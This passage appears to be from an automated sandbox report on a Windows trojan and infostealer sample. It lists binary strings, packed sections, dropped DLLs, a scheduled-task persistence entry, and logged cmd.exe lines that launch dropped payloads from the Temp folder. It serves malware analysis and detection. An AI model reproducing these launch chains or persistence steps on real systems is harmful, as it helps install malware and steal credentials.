                        Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/VxHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0
                        Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                        Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                        Source: file.exe, 00000000.00000003.1771969155.0000000028F69000.00000004.00000020.00020000.00000000.sdmp, HDAFBGIJKEGIECAAFHDHDGCBFC.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                        Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                        Source: file.exe, 00000000.00000003.1771969155.0000000028F69000.00000004.00000020.00020000.00000000.sdmp, HDAFBGIJKEGIECAAFHDHDGCBFC.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

                        System Summary

                        barindex
                        Source: amadka[1].exe.0.drStatic PE information: section name:
                        Source: amadka[1].exe.0.drStatic PE information: section name: .idata
                        Source: amadka[1].exe.0.drStatic PE information: section name:
                        Source: JJEGIJEGDB.exe.0.drStatic PE information: section name:
                        Source: JJEGIJEGDB.exe.0.drStatic PE information: section name: .idata
                        Source: JJEGIJEGDB.exe.0.drStatic PE information: section name:
                        Source: explorti.exe.5.drStatic PE information: section name:
                        Source: explorti.exe.5.drStatic PE information: section name: .idata
                        Source: explorti.exe.5.drStatic PE information: section name:
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name:
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C61ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,0_2_6C61ED10
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C65B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C65B700
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C65B8C0 rand_s,NtQueryVirtualMemory,0_2_6C65B8C0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C65B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,0_2_6C65B910
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C5FF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C5FF280
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C5F35A00_2_6C5F35A0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6054770_2_6C605477
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C66545C0_2_6C66545C
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C66542B0_2_6C66542B
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C66AC000_2_6C66AC00
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C635C100_2_6C635C10
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C636CF00_2_6C636CF0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6064C00_2_6C6064C0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C61D4D00_2_6C61D4D0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C5FD4E00_2_6C5FD4E0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6534A00_2_6C6534A0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C65C4A00_2_6C65C4A0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C606C800_2_6C606C80
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C60FD000_2_6C60FD00
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6205120_2_6C620512
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C61ED100_2_6C61ED10
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6585F00_2_6C6585F0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C630DD00_2_6C630DD0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C666E630_2_6C666E63
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6146400_2_6C614640
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C642E4E0_2_6C642E4E
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C5FC6700_2_6C5FC670
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C619E500_2_6C619E50
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C633E500_2_6C633E50
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C659E300_2_6C659E30
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6456000_2_6C645600
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C637E100_2_6C637E10
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6676E30_2_6C6676E3
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C60FEF00_2_6C60FEF0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C5FBEF00_2_6C5FBEF0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C654EA00_2_6C654EA0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C65E6800_2_6C65E680
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C615E900_2_6C615E90
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C609F000_2_6C609F00
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6377100_2_6C637710
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C626FF00_2_6C626FF0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C5FDFE00_2_6C5FDFE0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6477A00_2_6C6477A0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C63F0700_2_6C63F070
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6188500_2_6C618850
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C61D8500_2_6C61D850
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C63B8200_2_6C63B820
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6448200_2_6C644820
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6078100_2_6C607810
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C61C0E00_2_6C61C0E0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6358E00_2_6C6358E0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6650C70_2_6C6650C7
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6260A00_2_6C6260A0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C60D9600_2_6C60D960
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C64B9700_2_6C64B970
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C66B1700_2_6C66B170
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C61A9400_2_6C61A940
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C62D9B00_2_6C62D9B0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6351900_2_6C635190
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6529900_2_6C652990
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C5FC9A00_2_6C5FC9A0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C639A600_2_6C639A60
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C611AF00_2_6C611AF0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C63E2F00_2_6C63E2F0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C638AC00_2_6C638AC0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C624AA00_2_6C624AA0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C60CAB00_2_6C60CAB0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C662AB00_2_6C662AB0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C66BA900_2_6C66BA90
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C5F22A00_2_6C5F22A0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C60C3700_2_6C60C370
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C5F53400_2_6C5F5340
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6653C80_2_6C6653C8
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C5FF3800_2_6C5FF380
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 12_2_0019E41012_2_0019E410
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 12_2_001D304812_2_001D3048
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 12_2_00194CD012_2_00194CD0
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 12_2_001C7D6312_2_001C7D63
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 12_2_001D763B12_2_001D763B
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 12_2_00194AD012_2_00194AD0
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 12_2_001D6EE912_2_001D6EE9
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 12_2_001D870012_2_001D8700
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 12_2_001D775B12_2_001D775B
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 12_2_001D2BB012_2_001D2BB0
                        Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                        Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                        Source: C:\Users\user\Desktop\file.exeCode function: String function: 6C62CBE8 appears 134 times
                        Source: C:\Users\user\Desktop\file.exeCode function: String function: 6C6394D0 appears 88 times
                        Source: file.exe, 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
                        Source: file.exe, 00000000.00000002.1822925903.000000000149E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs file.exe
                        Source: file.exe, 00000000.00000002.1869148294.000000006C875000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs file.exe
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: file.exeStatic PE information: Section: ZLIB complexity 0.9996427210365854
                        Source: file.exeStatic PE information: Section: ZLIB complexity 0.99188232421875
                        Source: file.exeStatic PE information: Section: ZLIB complexity 0.9896240234375
                        Source: amadka[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.9984097506830601
                        Source: amadka[1].exe.0.drStatic PE information: Section: ohmzqnep ZLIB complexity 0.9941242376864512
                        Source: JJEGIJEGDB.exe.0.drStatic PE information: Section: ZLIB complexity 0.9984097506830601
                        Source: JJEGIJEGDB.exe.0.drStatic PE information: Section: ohmzqnep ZLIB complexity 0.9941242376864512
                        Source: explorti.exe.5.drStatic PE information: Section: ZLIB complexity 0.9984097506830601
                        Source: explorti.exe.5.drStatic PE information: Section: ohmzqnep ZLIB complexity 0.9941242376864512
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/27@0/3
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C657030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,0_2_6C657030
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: file.exe, 00000000.00000003.1703015007.00000000229C4000.00000004.00000020.00020000.00000000.sdmp, FCAEBFIJKEBGHIDHIEGI.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                        Source: file.exeVirustotal: Detection: 47%
                        Source: JJEGIJEGDB.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KJJJJDHIDB.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe"
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KJJJJDHIDB.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mozglue.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wsock32.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dui70.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: duser.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.ui.immersive.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47mrm.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uianimation.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dxgi.dllJump to behavior
